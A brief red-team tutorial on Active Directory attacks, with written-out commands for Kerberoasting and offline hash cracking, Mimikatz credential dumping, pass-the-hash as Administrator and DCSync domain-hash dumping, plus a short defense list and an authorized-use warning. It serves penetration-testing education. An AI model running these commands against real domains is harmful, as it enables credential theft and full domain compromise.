Active Directory is the most targeted system in internal penetration tests. Understanding its attacks is essential for any Red Team professional.
Kerberoasting
Kerberoasting targets Service Accounts in Active Directory to crack their password hashes offline.
How It Works
# Extract service tickets
GetUserSPNs.py -request -dc-ip 192.168.1.1 domain/user
# Crack offline
hashcat -m 13100 hashes.txt wordlist.txt
Defense
- Use long service account passwords (25+ characters)
- Enable LAPS for local password management
- Monitor Event ID
4769
Active Directory Privilege Escalation
Pass-the-Hash (PtH)
# Mimikatz — extract hashes
privilege::debug
sekurlsa::logonpasswords
# Pass the hash
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:HASH
DCSync
# Dump all domain hashes
secretsdump.py -just-dc domain/user:password@dc-ip
Warning: These tools are for authorized testing environments only.